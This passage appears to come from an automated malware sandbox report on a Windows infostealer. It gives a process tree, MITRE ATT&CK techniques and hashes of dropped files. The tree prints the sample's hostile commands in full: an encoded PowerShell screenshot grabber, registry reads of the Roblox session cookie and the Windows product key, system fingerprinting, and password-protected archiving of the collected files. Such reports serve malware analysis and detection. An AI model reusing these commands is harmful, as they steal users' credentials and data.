AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmyaymww\xmyaymww.cmdline"
        5⤵
        
        PID:1788
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBDE.tmp" "c:\Users\Admin\AppData\Local\Temp\xmyaymww\CSC55F2C19A79E460AABAB9EE212D758ED.TMP"
        6⤵
        
        PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4496
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3360
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1600
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4816
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3276
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38362\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gKe1g.zip" *"
    3⤵
    PID:3188
  - - C:\Users\Admin\AppData\Local\Temp\_MEI38362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI38362\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gKe1g.zip" *
      4⤵
      Executes dropped EXE
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec3886f610955edb6bf0cf9383827bb7

SHA1
fc580e26e68c96e30f6b8f8782184f2016833b92

SHA256
d01e207c14b4ba3622cfc09bcd9bc6d084ab23242d1abac5140e7c92add2e1fa

SHA512
d2bf41a1f6496905e6e245b5d82f976b8d8adaa64d4ea2896e436e338fc54d9697fbe18ee36b7c62a4f185ba03c96a2f9534f2ed779439c146b284a46645e786

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBBDE.tmp

Filesize
1KB

MD5
4519b7f28cd0e3a220028179fcdf1ae6

SHA1
3869dffaa6e04316328515aaae5c925d51602092

SHA256
edaaf7ba4028e061ac7ffe6b9b5f6aac443582982d2290d7aecc1b0e57bcc6de

SHA512
dad29f4df32e79570fa7073903062fccd30b767ce2b167a7e05e3688bfcd39f5a5d7f3b8cc7f310440ec90e1efc95ab8324102b04ae548dd018451eafaee3352

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_bz2.pyd

Filesize
46KB

MD5
db5ec505d7c19345ca85d896c4bd7ef4

SHA1
c459bb6750937fbdc8ca078a74fd3d1e8461b11c

SHA256
d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9

SHA512
0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_ctypes.pyd

Filesize
56KB

MD5
26e65481188fe885404f327152b67c5e

SHA1
6cd74c25cc96fb61fc92a70bdfbbd4a36fda0e3d

SHA256
b76b63e8163b2c2b16e377114d41777041fcc948806d61cb3708db85cca57786

SHA512
5b58fc45efebc30f26760d22f5fe74084515f1f3052b34b0f2d1b825f0d6a2614e4edaf0ce430118e6aaaf4bb8fcc540699548037f99a75dd6e53f9816068857

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_decimal.pyd

Filesize
104KB

MD5
072e08b39c18b779446032bf2104247b

SHA1
a7ddad40ef3f0472e3c9d8a9741bd97d4132086c

SHA256
480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b

SHA512
c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_hashlib.pyd

Filesize
33KB

MD5
82d28639895b87f234a80017a285822a

SHA1
9190d0699fa2eff73435adf980586c866639205f

SHA256
9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e

SHA512
4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_lzma.pyd

Filesize
84KB

MD5
8bdd52b7bcab5c0779782391686f05c5

SHA1
281aad75da003948c82a6986ae0f4d9e0ba988eb

SHA256
d5001fbee0f9c6e3c566ac4d79705ba37a6cba81781eee9823682de8005c6c2a

SHA512
086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_queue.pyd

Filesize
24KB

MD5
3f13115b323fb7516054ba432a53e413

SHA1
340b87252c92c33fe21f8805acb9dc7fc3ff8999

SHA256
52a43a55458c7f617eb88b1b23874f0b5d741e6e2846730e47f09f5499dda7f2

SHA512
6b0383ee31d9bb5c1227981eb0ae5bb40e2d0a540bd605d24e5af455fd08935d726e5f327787d9340950311d8f7a655a7ea70635e1f95d33e089505f16ae64b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_socket.pyd

Filesize
41KB

MD5
abe1268857e3ace12cbd532e65c417f4

SHA1
dd987f29aabc940f15cd6bd08164ff9ae95c282f

SHA256
7110390fa56833103db0d1edbfd2fe519dd06646811402396eb44918b63e70d5

SHA512
392ac00c9d9e5440a8e29e5bae3b1a8e7ffb22a01692dad261324058d8ef32fedf95e43a144b7e365f7f0fedb0efb6f452c7ccaee45e41e2d1def660d11173c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_sqlite3.pyd

Filesize
54KB

MD5
00a246686f7313c2a7fe65bbe4966e96

SHA1
a6c00203afab2d777c99cc7686bab6d28e4f3f70

SHA256
cd3ade57c12f66331cb4d3c39276cbb8b41176026544b1ca4719e3ce146efe67

SHA512
c0e0f03616336f04678a0a16592fdc91aaa47c9bf11500a5dc3696aef4481f2fcbd64a82be78b30f3ffd4372c9e505edb000bdf05f2ad07bac54a457bb20bf7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\_ssl.pyd

Filesize
60KB

MD5
0c06eff0f04b3193a091aa6f77c3ff3f

SHA1
fdc8f3b40b91dd70a65ada8c75da2f858177ca1b

SHA256
5ecfe6f6ddf3b0a150e680d40c46940bc58334d0c622584772800913d436c7e2

SHA512
985974e1487bbb8f451588f648a4cf4d754dbfc97f1ab4733dd21cdeb1a3abad017c34ed6ee4bc89ac01ea19b6060ea8f817693336133d110b715c746d090e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\base_library.zip

Filesize
1.4MB

MD5
51f7b2f6b021864e40116c3cd9b2bdb5

SHA1
afc440a9dd43a4dc68d80e131da3c32a312a8459

SHA256
858be1ee68af27691773c438b67e643fdbaf9b8abd60bc716f30d1e1453df8de

SHA512
873eb4a1c45a0704440160cd0551f4de3e82d25aafbea91691b0d60e896f019e5822356fc0fa083aaea89935793a38c4d06b23da2018c3a231d769496c7a2523

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\blank.aes

Filesize
125KB

MD5
cbddd7e349b56bdf786eb071583f0178

SHA1
79596c5e594584005160eecf08c546815ef99cfd

SHA256
2ac30b9cfb884396a0e6578bfba18b7542ac8a71e17db6378ff2f4790cd5ea62

SHA512
091ba585a9af60034b06abb94cf20ac5d9d6496f40f0be09867d0c8301bf88269f9a7019148d4ee99e3cda50cea212633ee4b844795e2bbd59d4beb1007f35d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\bound.blank

Filesize
14KB

MD5
fd4c5d9bd2c5878e1f27aba82b629b37

SHA1
c63472718881f1e734fe7fe4d60f0a3261d4aa42

SHA256
ba79c765f2f1e314d557913bc43a64f9d8713c16aef2e1e44da90b71aadc8c24

SHA512
0cabdd01efd6572e57d2808c4d82613865fff2b8b94b357adc7d207ad284120fad375f45d290c716e21dff63e71c1b571dd4c11a4d48d0f618c634a57d7781df

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\libcrypto-1_1.dll

Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\libffi-8.dll

Filesize
27KB

MD5
87786718f8c46d4b870f46bcb9df7499

SHA1
a63098aabe72a3ed58def0b59f5671f2fd58650b

SHA256
1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33

SHA512
3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\python311.dll

Filesize
1.6MB

MD5
64fe8415b07e0d06ce078d34c57a4e63

SHA1
dd327f1a8ca83be584867aee0f25d11bff820a3d

SHA256
5d5161773b5c7cc15bde027eabc1829c9d2d697903234e4dd8f7d1222f5fe931

SHA512
55e84a5c0556dd485e7238a101520df451bb7aab7d709f91fdb0709fad04520e160ae394d79e601726c222c0f87a979d1c482ac84e2b037686cde284a0421c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\select.pyd

Filesize
24KB

MD5
062f0a9179c51d7ed621dac3dd222abd

SHA1
c7b137a2b1e7b16bfc6160e175918f4d14cf107c

SHA256
91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453

SHA512
b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\sqlite3.dll

Filesize
606KB

MD5
dcc391b3b52bac0f6bd695d560d7f1a9

SHA1
a061973a5f7c52c34a0b087cc918e29e3e704151

SHA256
762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859

SHA512
42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38362\unicodedata.pyd

Filesize
294KB

MD5
26f7ccda6ba4de5f310da1662f91b2ba

SHA1
5fb9472a04d6591ec3fee7911ad5b753c62ecf17

SHA256
1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60

SHA512
0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lvtjrhqb.jqv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
32KB

MD5
97c8aa774511191a64f348becb78db20

SHA1
d2dfb5e3604519f294ca1419455becb1db913719

SHA256
1907591a70faa7dd393bc3ab233642f9837733b61823948d1272a946113f84fd

SHA512
70c9c49319e320708204715093b856bc07ce3ea41a1dc2fc4996cfcf64292cf7cac11ae86bbcc579710549f056d7921aea7f98cdf15962b7bad5736aaf33ae2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmyaymww\xmyaymww.dll

Filesize
4KB

MD5
bae14b3a5b25f3fb6743551cb6475991

SHA1
0db91dc4f29ed0a5afaa4cd8829c1a5e29ed0ad1

SHA256
02a330d9e5459000fabb8f67aa0172cb6b6b96b28aae15236ebe32341c3f0004

SHA512
b316ea9778e004663baa76644856e6547062f43f8ff0e5bad500659159f544ca645aec83c69516559f605ffae45f08351f0ff12bb7b9148e93bc81637b3fbbb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Desktop.txt

Filesize
702B

MD5
4bdfa661d4c2874f39da934365dd38ce

SHA1
f8c7cb9345f6aa72e53662c5908f1812b06c4e33

SHA256
53f5f0d600db5d99449733b5e8f3c40bf40a7568949f931e647f71a85a01178e

SHA512
8a0c0be8d646bbbb0675e3c8005facb95198f5a96eab8b61a94e3ca5cf9094b96ef20e0bc07d55b6e60d37280773ba97bbf1343fdd7a544c0be9b8c64b280f1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Documents.txt

Filesize
948B

MD5
d082018b09b68a890b306db22903ce84

SHA1
51d776bc4fad02253cf85fdef89e99713a152c69

SHA256
